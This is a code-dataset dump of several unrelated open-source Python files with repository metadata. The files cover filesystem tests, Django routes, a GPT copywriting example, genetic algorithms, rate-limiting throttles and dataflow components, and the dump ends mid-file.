] | 27 | 2015-03-30T08:42:56.000Z | 2022-02-02T01:18:48.000Z | fs/tests/test_basename.py | sturmianseq/python-fs | 2567922ced9387e327e65f3244caff3b7af35684 | [
"MIT"
] | 8 | 2015-06-02T11:50:58.000Z | 2022-02-27T18:51:14.000Z | fs/tests/test_basename.py | sturmianseq/python-fs | 2567922ced9387e327e65f3244caff3b7af35684 | [
"MIT"
] | 12 | 2015-03-30T08:42:59.000Z | 2021-11-27T19:37:03.000Z | import fs
from .setup import * | 21.230769 | 46 | 0.601449 | import fs
from .setup import *
def test_basename_from_path():
_filename = 'test'
_ext = ".txt"
_file = "foo/bar/%s%s" % (_filename, _ext)
_base = fs.basename(_file)
assert _base == "%s%s" % (_filename, _ext)
def test_basename_from_file():
_filename = 'test'
_ext = ".txt"
_file = "%s%s" % (_filename, _ext)
_base = fs.basename(_file)
assert _base == "%s%s" % (_filename, _ext)
def test_basename_strip_ext():
_filename = 'test'
_ext = ".txt"
_file = "foo/bar/%s%s" % (_filename, _ext)
_base = fs.basename(_file, ext=_ext)
assert _base == "%s" % _filename
def test_basename_autostrip_ext():
_filename = 'test'
_ext = ".txt"
_file = "foo/bar/%s%s" % (_filename, _ext)
_base = fs.basename(_file, ext=False)
assert _base == "%s" % _filename | 705 | 0 | 92 |
c5a555a8b9b1cb1e5f2287edaf048bdd98415f62 | 273 | py | Python | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | null | null | null | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | 2 | 2021-11-25T23:30:13.000Z | 2021-11-28T14:51:44.000Z | scraper/urls.py | yujhenchen/boulderingScraper | 03d3c0bb0cb25b783476edd9150bd94413dd08a4 | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('competitions', views.competitions, name='competitions'),
path('athletes', views.athletes, name='athletes'),
path('news', views.news, name='news')
] | 27.3 | 66 | 0.673993 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('competitions', views.competitions, name='competitions'),
path('athletes', views.athletes, name='athletes'),
path('news', views.news, name='news')
] | 0 | 0 | 0 |
78f99f79e162e5576845d61737e73b44e165cf59 | 3,110 | py | Python | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | examples/Sales_Copy/run_feature_benefits.py | paigebranam/Halldon_ | 1f02878e39e818055f86b8db570f30ae280948dc | [
"MIT"
] | null | null | null | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.5,
top_p=1,
max_tokens=100)
##Generate feature to benefit for product
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""A deeper richer bass, an expansive soundstage, and less distortion make listening to your favorite music with AirPods Max a treat for the ears."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Experience wireless audio the way it’s meant to be heard with AirPods Max"""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""AirPods Max sound better than the original AirPods, feature world-class noise cancellation and come with TrueWireless™ technology."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Listen to more of your music than ever, in unparalleled quality, with no wires."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Perfect size for my two year old. More space than I thought but with a slim design, it doesn’t take up too much room in my diaper bag."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""If you are a parent you understand how you want the best for your child. The Bento Box is perfect for little hands.
It promotes portion control and healthy eating habits."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Because the 3 compartment, 6 separate container is so much bigger, it takes less time to pack the lunchbox up."""))
# Define UI configuration
config = UIConfig(description="Create feature to benefits for your product",
button_text="Create",
placeholder="Enter product description and name")
id = "feature-benefits" | 51.833333 | 151 | 0.749839 | ##updated api path, engine, top p
##Runs as expected
import os
import sys
API_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
sys.path.append(API_PATH)
from api import GPT, Example, UIConfig
# Construct GPT object and show some examples
gpt = GPT(engine="curie-instruct-beta",
temperature=0.5,
top_p=1,
max_tokens=100)
##Generate feature to benefit for product
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""A deeper richer bass, an expansive soundstage, and less distortion make listening to your favorite music with AirPods Max a treat for the ears."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Experience wireless audio the way it’s meant to be heard with AirPods Max"""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""AirPods Max sound better than the original AirPods, feature world-class noise cancellation and come with TrueWireless™ technology."""))
gpt.add_example(Example("""AirPods Max, Introducing AirPods Max — a perfect balance of exhilarating high-fidelity audio
and the effortless magic of AirPods. The ultimate personal listening experience is here.""",
"""Listen to more of your music than ever, in unparalleled quality, with no wires."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Perfect size for my two year old. More space than I thought but with a slim design, it doesn’t take up too much room in my diaper bag."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""If you are a parent you understand how you want the best for your child. The Bento Box is perfect for little hands.
It promotes portion control and healthy eating habits."""))
gpt.add_example(Example("""Bento Lunch Box Container, slim design but it is also more than enough space,
sometimes too much. The biggest plus is that it is BPA free and FDA approved. A huge win when trying to eat clean!""",
"""Because the 3 compartment, 6 separate container is so much bigger, it takes less time to pack the lunchbox up."""))
# Define UI configuration
config = UIConfig(description="Create feature to benefits for your product",
button_text="Create",
placeholder="Enter product description and name")
id = "feature-benefits" | 0 | 0 | 0 |
3ea22cc355f99d35ee6009dc89e48eddc997383e | 4,875 | py | Python | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | Transposon.py | blakedallen/transposon | c94c2a9323a0f20042068bf75f3736ca51b1f239 | [
"MIT"
] | null | null | null | import numpy as np
from random import randint
class Transposon(object):
""" Transposon is our general class used for evolutionary
algorithms applied to vectors"""
def initialize(self):
""" sets up our population and asserts
our fitness func is of correct type
"""
assert self.mutation_rate >= 0.0
assert self.mutation_rate <= 1.0
assert self.fitness_func != None
assert self.winner_pool >= 0.0
assert self.winner_pool <= 1.0
assert self.vector_len >= 0.0
#setup a random vector and assert that our fitness_func is of correct type
random_vector = self.create_vector()
#use our fitness function, assert that the value is correct
fitness = self.fitness_func(random_vector)
assert fitness >= 0.0
#now create our population
population = [random_vector]
for i in range(1,self.population_size):
population.append(self.create_vector())
self.population = population
def create_vector(self, replace=False):
"""
Create a random vector
replace = whether or not we can replace values (default false, ie: each value is unique)
"""
return np.random.choice(self.values, self.vector_len, replace=replace).tolist()
def mutate(self):
""" create mutations randomly based on the mutation rate
preserves winner pool so that the best individuals aren't mutated
"""
if self.mutation_rate == 0:
return
mutated_population = []
for i,individual in enumerate(self.population):
mutation_vec = np.random.choice(2, len(individual), p=[1.0-self.mutation_rate, self.mutation_rate])
combined_vec = []
for i,m in enumerate(mutation_vec):
if m == 1:
#random mutation
rand = randint(self.min_value, self.max_value)
combined_vec.append(rand)
else:
#no mutation
combined_vec.append(individual[i])
mutated_population.append(combined_vec)
#now we preserve our best individuals and drop the last x mutated individuals
num_best = int(self.winner_pool*self.population_size)
self.population = self.population[:num_best] + mutated_population[:len(mutated_population)-num_best]
def transpose(self):
""" Transpose is another mutation function where we mimic actual transposons
moving a random sequence from one location and inserting it into another location"""
pass
def breed(self, replace=True):
""" given the top x percent breed new solutions """
num_breeders = int(self.winner_pool*self.population_size)
breeders = self.population[:num_breeders]
num_children = self.population_size - num_breeders
pairings = np.random.choice(num_breeders, num_children, replace=replace)
children = []
for i,pair in enumerate(pairings):
i1 = int(i%len(breeders))
i2 = int(pair%len(breeders))
parent1 = breeders[i1]
parent2 = breeders[i2]
child_vector = []
#create our vector [0,1,0,0..] which chooses which item to take from each individual
breed_vector = np.random.choice(2, len(breeders[0]))
for i,v in enumerate(breed_vector):
if v == 0:
child_vector.append(parent1[i])
else:
child_vector.append(parent2[i])
children.append(child_vector)
#now create our new population
self.population = self.population[:num_breeders] + children
def evaluate(self):
"""
evaluate the fitness of each individual
sort the individuals by fitness (descending order with most fit first)
if any individual is of max_fitness then return true, else false
"""
scored = []
for individual in self.population:
fitness = self.fitness_func(individual)
scored.append((individual,fitness))
#sort our individuals by fitness (Descending)
sorted_pop = sorted(scored, reverse=True, key=lambda x: x[1])
#sort our population in descending fitness
self.population = [x[0] for x in sorted_pop]
#return just our fitness scores
return [x[1] for x in sorted_pop]
def evolve(self):
""" main for-loop for genetic algorithm"""
for i in range(0,self.max_generations):
pop_fitness = self.evaluate()
if self.verbose == True:
print("Generation: ", i, " Top fitness: ", pop_fitness[0])
if pop_fitness[0] >= self.max_fitness:
return self.population
self.breed()
self.mutate()
#reached max generations without getting a max_fitness
return self.population
| 31.451613 | 102 | 0.726974 | import numpy as np
from random import randint
class Transposon(object):
""" Transposon is our general class used for evolutionary
algorithms applied to vectors"""
def __init__(self,
vector_len=100,
fitness_func=None,
min_value=0,
max_value=100,
population_size=1000,
max_fitness=1.0,
max_generations=1000,
mutation_rate=0.13,
winner_pool=0.10,
verbose=False):
self.vector_len = vector_len
self.fitness_func = fitness_func
self.population_size = population_size
self.max_fitness = max_fitness
self.verbose = verbose
self.winner_pool = winner_pool
self.values = [x for x in range(min_value, max_value+1)]
self.max_generations = max_generations
self.mutation_rate = mutation_rate
self.min_value = min_value
self.max_value = max_value
self.initialize()
def initialize(self):
""" sets up our population and asserts
our fitness func is of correct type
"""
assert self.mutation_rate >= 0.0
assert self.mutation_rate <= 1.0
assert self.fitness_func != None
assert self.winner_pool >= 0.0
assert self.winner_pool <= 1.0
assert self.vector_len >= 0.0
#setup a random vector and assert that our fitness_func is of correct type
random_vector = self.create_vector()
#use our fitness function, assert that the value is correct
fitness = self.fitness_func(random_vector)
assert fitness >= 0.0
#now create our population
population = [random_vector]
for i in range(1,self.population_size):
population.append(self.create_vector())
self.population = population
def create_vector(self, replace=False):
"""
Create a random vector
replace = whether or not we can replace values (default false, ie: each value is unique)
"""
return np.random.choice(self.values, self.vector_len, replace=replace).tolist()
def mutate(self):
""" create mutations randomly based on the mutation rate
preserves winner pool so that the best individuals aren't mutated
"""
if self.mutation_rate == 0:
return
mutated_population = []
for i,individual in enumerate(self.population):
mutation_vec = np.random.choice(2, len(individual), p=[1.0-self.mutation_rate, self.mutation_rate])
combined_vec = []
for i,m in enumerate(mutation_vec):
if m == 1:
#random mutation
rand = randint(self.min_value, self.max_value)
combined_vec.append(rand)
else:
#no mutation
combined_vec.append(individual[i])
mutated_population.append(combined_vec)
#now we preserve our best individuals and drop the last x mutated individuals
num_best = int(self.winner_pool*self.population_size)
self.population = self.population[:num_best] + mutated_population[:len(mutated_population)-num_best]
def transpose(self):
""" Transpose is another mutation function where we mimic actual transposons
moving a random sequence from one location and inserting it into another location"""
pass
def breed(self, replace=True):
""" given the top x percent breed new solutions """
num_breeders = int(self.winner_pool*self.population_size)
breeders = self.population[:num_breeders]
num_children = self.population_size - num_breeders
pairings = np.random.choice(num_breeders, num_children, replace=replace)
children = []
for i,pair in enumerate(pairings):
i1 = int(i%len(breeders))
i2 = int(pair%len(breeders))
parent1 = breeders[i1]
parent2 = breeders[i2]
child_vector = []
#create our vector [0,1,0,0..] which chooses which item to take from each individual
breed_vector = np.random.choice(2, len(breeders[0]))
for i,v in enumerate(breed_vector):
if v == 0:
child_vector.append(parent1[i])
else:
child_vector.append(parent2[i])
children.append(child_vector)
#now create our new population
self.population = self.population[:num_breeders] + children
def evaluate(self):
"""
evaluate the fitness of each individual
sort the individuals by fitness (descending order with most fit first)
if any individual is of max_fitness then return true, else false
"""
scored = []
for individual in self.population:
fitness = self.fitness_func(individual)
scored.append((individual,fitness))
#sort our individuals by fitness (Descending)
sorted_pop = sorted(scored, reverse=True, key=lambda x: x[1])
#sort our population in descending fitness
self.population = [x[0] for x in sorted_pop]
#return just our fitness scores
return [x[1] for x in sorted_pop]
def evolve(self):
""" main for-loop for genetic algorithm"""
for i in range(0,self.max_generations):
pop_fitness = self.evaluate()
if self.verbose == True:
print("Generation: ", i, " Top fitness: ", pop_fitness[0])
if pop_fitness[0] >= self.max_fitness:
return self.population
self.breed()
self.mutate()
#reached max generations without getting a max_fitness
return self.population
| 623 | 0 | 24 |
f50d60ba29fb57d14a40dc72e1e8a1b0b30c5600 | 1,170 | py | Python | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null | google codejam/sorting/Reversort engineering/Answer.py | theCodeTeen/CP_Collection | 78a0a564e8da47038232b0cca6f26153725af029 | [
"MIT"
] | null | null | null |
for i in range(int(input())):
solution()
#Author: Dharmik Bhadra | 20.892857 | 57 | 0.460684 | def createArray(no):
arr=[]
for i in range(1,no+1):
arr.append(i)
return arr
def ArrayOpp(no,cost):
if cost<no-1:
return []
arr=[]
t=0
c=1
for i in range(no-1,0,-1):
c+=1
if t+c+i-1>=cost:
r=cost-t-i+1
arr.append(r)
for k in range(i-1):
arr.append(1)
t=cost
break
t+=c
arr.append(c)
if t<cost:
return[]
return arr
def opp(arr,opArray):
length=len(opArray)
for i in range(length):
t=len(arr)-(i+2)
sp=t+opArray[i]
arr=arr[:t]+list(reversed(arr[t:sp])) + arr[sp:]
return arr
def solution():
inp=input().split()
no=int(inp[0])
cost=int(inp[1])
arr=createArray(no)
opArray=ArrayOpp(no,cost)
arr=opp(arr,opArray)
result=""
if opArray:
for item in arr:
result += str(item)+" "
else:
result="IMPOSSIBLE"
print("Case #"+str(i+1)+": "+str(result))
for i in range(int(input())):
solution()
#Author: Dharmik Bhadra | 993 | 0 | 99 |
8bfdb2468a7478d911bc550aafd9389c3602480f | 1,061 | py | Python | Chapter08/SVector2D.py | fengsong77/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 5 | 2017-06-15T02:08:08.000Z | 2021-05-24T12:17:04.000Z | Chapter08/SVector2D.py | fengsong77/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 2 | 2017-10-20T22:23:45.000Z | 2018-12-02T13:17:34.000Z | Chapter09/SVector2D.py | crazyskady/ai-game-python | ed47596c5ed9989b344069b07bef055c8c0560e9 | [
"MIT"
] | 5 | 2017-10-23T15:02:20.000Z | 2021-06-06T08:28:36.000Z | # -*- coding: utf-8 -*-
from math import sqrt
| 25.261905 | 156 | 0.694628 | # -*- coding: utf-8 -*-
from math import sqrt
class SVector2D(object):
def __init__(self, a=0.0, b=0.0):
self._x = a
self._y = b
return
def __add__(self, rhs):
return SVector2D(self._x+rhs._x, self._y+rhs._y)
def __sub__(self, rhs):
return SVector2D(self._x-rhs._x, self._y-rhs._y)
def __mul__(self, rhs):
if isinstance(rhs, SVector2D):
return SVector2D(self._x*rhs._x, self._y*rhs._y)
else:
return SVector2D(self._x*rhs, self._y*rhs)
def __div__(self, rhs): #这些都可以改写成 return SVector2D(self._x/rhs._x, self._y/rhs._y) if isinstance(rhs, SVector2D) else SVector2D(self._x/rhs, self._y/rhs)
if isinstance(rhs, SVector2D):
return SVector2D(self._x/rhs._x, self._y/rhs._y)
else:
return SVector2D(self._x/rhs, self._y/rhs)
def Vec2DLength(v):
return sqrt(v._x*v._x + v._y*v._y)
def Vec2DNormalize(v):
vector_length = Vec2DLength(v)
return SVector2D(v._x/vector_length, v._y/vector_length)
def Vec2DDot(v1, v2):
return v1._x*v2._x + v1._y*v2._y
def Vec2DSign(v1, v2):
return 1 if v1._y*v2._x > v1._x*v2._y else -1
| 793 | 3 | 234 |
fe62a3b8c957cd45f1e51b3e86c79f886f93ff1a | 6,443 | py | Python | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | 2 | 2020-09-02T13:46:06.000Z | 2020-10-11T16:11:02.000Z | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | xTool/utils/throttle.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | 4 | 2018-10-15T07:08:34.000Z | 2019-11-26T01:52:47.000Z | # coding: utf-8
from builtins import object
import time
import threading
from xTool.compat import PY3
if PY3:
from threading import BoundedSemaphore
else:
from threading import _BoundedSemaphore as BoundedSemaphore
class BoundedEmptySemaphore(BoundedSemaphore):
"""
A bounded semaphore that is initially empty.
"""
class GlobalThrottle(object):
"""一个线程安全的全局限速器,用于访问全局资源;可以应用到所有的线程上。
也可以认为是一个令牌桶算法,BoundedEmptySemaphore就是一个令牌桶。
A thread-safe rate limiter that throttles all threads globally. This should be used to
regulate access to a global resource. It can be used as a function/method decorator or as a
simple object, using the throttle() method. The token generation starts with the first call
to throttle() or the decorated function. Each subsequent call to throttle() will then acquire
a token, possibly having to wait until one becomes available. The number of unused tokens
will not exceed a limit given at construction time. This is a very basic mechanism to
prevent the resource from becoming swamped after longer pauses.
"""
def __init__(self, min_interval, max_unused):
"""
:param min_interval: 资源探测的间隔时间,也即令牌的生成间隔
:param max_unused: 信号量的大小,即资源的数量,也即令牌的数量
"""
# 线程的间隔时间
self.min_interval = min_interval
# 创建信号量,并调用acquire使其内部计数器等于0,阻塞进程
self.semaphore = BoundedEmptySemaphore(max_unused)
# 创建线程锁
self.thread_start_lock = threading.Lock()
# 默认不启动线程
self.thread_started = False
# 创建线程
self.thread = threading.Thread(target=self.generator)
# 主线程结束时,子线程也随之结束
self.thread.daemon = True
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval passed
since the most recent time an invocation of this method returned True in any thread.
If the wait parameter is False, this method immediatly returns True if at least the
configured minimum interval has passed since the most recent time this method returned
True in any thread, or False otherwise.
"""
# I think there is a race in Thread.start(), hence the lock
with self.thread_start_lock:
# 启动子线程,不停地释放信号量
if not self.thread_started:
self.thread.start()
self.thread_started = True
# 新请求来临时,会各自拿走一个Token, 如果没有Token可拿了就阻塞或者拒绝服务.
return self.semaphore.acquire(blocking=wait)
class LocalThrottle(object):
"""一个线程安全的单个线程限速器,在指定时间间隔后才会运行
A thread-safe rate limiter that throttles each thread independently. Can be used as a
function or method decorator or as a simple object, via its .throttle() method.
The use as a decorator is deprecated in favor of throttle().
"""
def __init__(self, min_interval):
"""
Initialize this local throttle.
:param min_interval: The minimum interval in seconds between invocations of the throttle
method or, if this throttle is used as a decorator, invocations of the decorated method.
"""
self.min_interval = min_interval
# 线程局部变量
self.per_thread = threading.local()
self.per_thread.last_invocation = None
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval has
passed since the last invocation of this method in the current thread returned True.
If the wait parameter is False, this method immediatly returns True (if at least the
configured minimum interval has passed since the last time this method returned True in
the current thread) or False otherwise.
"""
now = time.time()
last_invocation = self.per_thread.last_invocation
if last_invocation is not None:
# 计算时间过了多久
interval = now - last_invocation
# 时间未过期,继续等待;到期后执行函数
if interval < self.min_interval:
if wait:
remainder = self.min_interval - interval
time.sleep(remainder)
else:
return False
self.per_thread.last_invocation = time.time()
return True
class throttle(object): # pylint: disable=invalid-name
"""在函数执行之后等待,直到超时;如果有异常不等待
A context manager for ensuring that the execution of its body takes at least a given amount
of time, sleeping if necessary. It is a simpler version of LocalThrottle if used as a
decorator.
Ensures that body takes at least the given amount of time.
"""
| 35.794444 | 97 | 0.652025 | # coding: utf-8
from builtins import object
import time
import threading
from xTool.compat import PY3
if PY3:
from threading import BoundedSemaphore
else:
from threading import _BoundedSemaphore as BoundedSemaphore
class BoundedEmptySemaphore(BoundedSemaphore):
"""
A bounded semaphore that is initially empty.
"""
def __init__(self, value=1):
super(BoundedEmptySemaphore, self).__init__(value)
# 如果从令牌桶算法算法角度出发,即令牌桶算法在初始化时使用完所有的令牌
# value:是令牌桶中初始的令牌数量
for i in range(value):
assert self.acquire(blocking=False)
class GlobalThrottle(object):
"""一个线程安全的全局限速器,用于访问全局资源;可以应用到所有的线程上。
也可以认为是一个令牌桶算法,BoundedEmptySemaphore就是一个令牌桶。
A thread-safe rate limiter that throttles all threads globally. This should be used to
regulate access to a global resource. It can be used as a function/method decorator or as a
simple object, using the throttle() method. The token generation starts with the first call
to throttle() or the decorated function. Each subsequent call to throttle() will then acquire
a token, possibly having to wait until one becomes available. The number of unused tokens
will not exceed a limit given at construction time. This is a very basic mechanism to
prevent the resource from becoming swamped after longer pauses.
"""
def __init__(self, min_interval, max_unused):
"""
:param min_interval: 资源探测的间隔时间,也即令牌的生成间隔
:param max_unused: 信号量的大小,即资源的数量,也即令牌的数量
"""
# 线程的间隔时间
self.min_interval = min_interval
# 创建信号量,并调用acquire使其内部计数器等于0,阻塞进程
self.semaphore = BoundedEmptySemaphore(max_unused)
# 创建线程锁
self.thread_start_lock = threading.Lock()
# 默认不启动线程
self.thread_started = False
# 创建线程
self.thread = threading.Thread(target=self.generator)
# 主线程结束时,子线程也随之结束
self.thread.daemon = True
def generator(self):
while True:
try:
# 随着时间流逝,系统会按恒定1/QPS时间间隔(如果QPS=100,则间隔是10ms)往桶里加入Token
# (想象和漏洞漏水相反,有个水龙头在不断的加水),如果桶已经满了就不再加了.
# 新请求来临时,会各自拿走一个Token,如果没有Token可拿了就阻塞或者拒绝服务.
self.semaphore.release()
except ValueError:
pass
time.sleep(self.min_interval)
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval passed
since the most recent time an invocation of this method returned True in any thread.
If the wait parameter is False, this method immediatly returns True if at least the
configured minimum interval has passed since the most recent time this method returned
True in any thread, or False otherwise.
"""
# I think there is a race in Thread.start(), hence the lock
with self.thread_start_lock:
# 启动子线程,不停地释放信号量
if not self.thread_started:
self.thread.start()
self.thread_started = True
# 新请求来临时,会各自拿走一个Token, 如果没有Token可拿了就阻塞或者拒绝服务.
return self.semaphore.acquire(blocking=wait)
def __call__(self, function):
def wrapper(*args, **kwargs):
self.throttle()
return function(*args, **kwargs)
return wrapper
class LocalThrottle(object):
"""一个线程安全的单个线程限速器,在指定时间间隔后才会运行
A thread-safe rate limiter that throttles each thread independently. Can be used as a
function or method decorator or as a simple object, via its .throttle() method.
The use as a decorator is deprecated in favor of throttle().
"""
def __init__(self, min_interval):
"""
Initialize this local throttle.
:param min_interval: The minimum interval in seconds between invocations of the throttle
method or, if this throttle is used as a decorator, invocations of the decorated method.
"""
self.min_interval = min_interval
# 线程局部变量
self.per_thread = threading.local()
self.per_thread.last_invocation = None
def throttle(self, wait=True):
"""
If the wait parameter is True, this method returns True after suspending the current
thread as necessary to ensure that no less than the configured minimum interval has
passed since the last invocation of this method in the current thread returned True.
If the wait parameter is False, this method immediatly returns True (if at least the
configured minimum interval has passed since the last time this method returned True in
the current thread) or False otherwise.
"""
now = time.time()
last_invocation = self.per_thread.last_invocation
if last_invocation is not None:
# 计算时间过了多久
interval = now - last_invocation
# 时间未过期,继续等待;到期后执行函数
if interval < self.min_interval:
if wait:
remainder = self.min_interval - interval
time.sleep(remainder)
else:
return False
self.per_thread.last_invocation = time.time()
return True
def __call__(self, function):
def wrapper(*args, **kwargs):
self.throttle()
return function(*args, **kwargs)
return wrapper
class throttle(object): # pylint: disable=invalid-name
"""在函数执行之后等待,直到超时;如果有异常不等待
A context manager for ensuring that the execution of its body takes at least a given amount
of time, sleeping if necessary. It is a simpler version of LocalThrottle if used as a
decorator.
Ensures that body takes at least the given amount of time.
"""
def __init__(self, min_interval):
self.min_interval = min_interval
def __enter__(self):
self.start = time.time()
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is None:
# 计算执行时间
duration = time.time() - self.start
# 如果函数执行完之后,还未超时,则继续等待
remainder = self.min_interval - duration
if remainder > 0:
time.sleep(remainder)
def __call__(self, function):
def wrapper(*args, **kwargs):
with self:
return function(*args, **kwargs)
return wrapper
| 1,692 | 0 | 216 |
8a58b8624f19ba243cc918e2073ff83514cb5c53 | 12,589 | py | Python | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 60 | 2017-03-18T10:01:16.000Z | 2021-12-07T02:55:43.000Z | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 14 | 2017-04-11T06:10:02.000Z | 2018-03-16T12:40:20.000Z | pyperator/components.py | baffelli/pyperator | 4b4d176db993708dc1f7d8cec048d490910213b7 | [
"MIT"
] | 8 | 2017-11-01T11:33:34.000Z | 2019-12-01T22:58:38.000Z | import asyncio
import glob as _glob
import itertools as _iter
import pathlib as _path
import random as _rand
import functools
from pyperator import IP
from pyperator.nodes import Component
from pyperator.utils import InputPort, OutputPort, FilePort
from pyperator.decorators import log_schedule, component, inport, outport
class GeneratorSource(Component):
"""
This is a component that returns a single element from a generator
passed at initalization time to 'gen'
to a single output 'OUT'
"""
@log_schedule
class FormatString(Component):
"""
This component formats
a string "{}" given on
the port "pattern"
the values of the input packets
and sends it to "OUT"
"""
class GlobSource(Component):
"""
This is a component that emits Packets
according to a glob pattern specified
when the component is initialized
"""
@log_schedule
class Product(Component):
"""
This component generates the
cartesian product of the packets incoming from each ports and
then sends them to the output port `OUT` as bracket IPs.
Alternatively, by providing a function `fun` to the constructor, another
combinatorial function can be used to generate the packets.
"""
@log_schedule
class FileListSource(Component):
"""
This is a component that emits InformationPackets
from a list of files
"""
@log_schedule
class ReplacePath(Component):
"""
This is a component that emits InformationPackets
with a path obtained by replacing the input path
"""
@log_schedule
class Split(Component):
"""
This component splits the input tuple into
separate ouputs; the number of elements is given
with `n_outs`
"""
@log_schedule
# class IterSource(Component):
# """
# This component returns a Bracket IP
# from a itertool function such as product
# """
#
# def __init__(self, name, *generators, function=_iter.combinations):
# super(IterSource, self).__init__(name)
# self.generators = generators
# self.outputs.add(OutputPort('OUT'))
# self.function = function
#
# @log_schedule
# async def __call__(self):
# for items in self.function(*self.generators):
# open = IP.OpenBracket()
# await self.outputs.OUT.send_packet(open)
# for item in items:
# packet = IP.InformationPacket(item)
# await self.outputs.OUT.send_packet(packet)
# await self.outputs.OUT.send_packet(IP.CloseBracket())
# await asyncio.sleep(0)
# await self.close_downstream()
class ConstantSource(Component):
"""
This is a component that continously outputs a constant to
the output 'OUT', up to to :repeat: times, infinitely if :repeat: is none
The constant is given to the 'constant' port
"""
@log_schedule
class Repeat(Component):
"""
This component receives
from his input once only
and keeps on repeating
it on the output
"""
class Filter(Component):
"""
This component filters the input in 'IN' according to the given predicate in the port 'predicate'
and sends it to the output 'OUT' if the predicate is true
"""
@log_schedule
class BroadcastApplyFunction(Component):
"""
This component computes a function of the inputs
and sends it to all outputs
"""
@log_schedule
class OneOffProcess(BroadcastApplyFunction):
"""
This class awaits the upstream process once and then keeps on
broadcasting the result to the outputs
"""
@log_schedule
@outport('OUT')
@inport('IN')
@component
async def Once(self):
"""
This component
receives from `IN` once and sends
the result to `OUT`. Afterwards, it closes
:param self:
:return:
"""
in_packet = await self.inputs.IN.receive_packet()
await self.outputs.OUT.send_packet(in_packet.copy())
self.inputs.IN.close()
@inport("IN")#: inputs :
@outport("OUT")
@component
async def Repeat(self):
"""
This component receives from `IN` once
and repeats it to `OUT` forever
:param self:
:return:
"""
in_packet= await self.inputs.IN.receive_packet()
async with self.outputs.OUT as out:
while True:
await out.send_packet(in_packet.copy())
await asyncio.sleep(0)
@inport('IN')
@outport('count')
@inport('reset', optional=True)
@component
async def Count(self):
"""
This component receives packets from `IN`
and keeps a count that will be continously
sent to `count`
:param self:
:return:
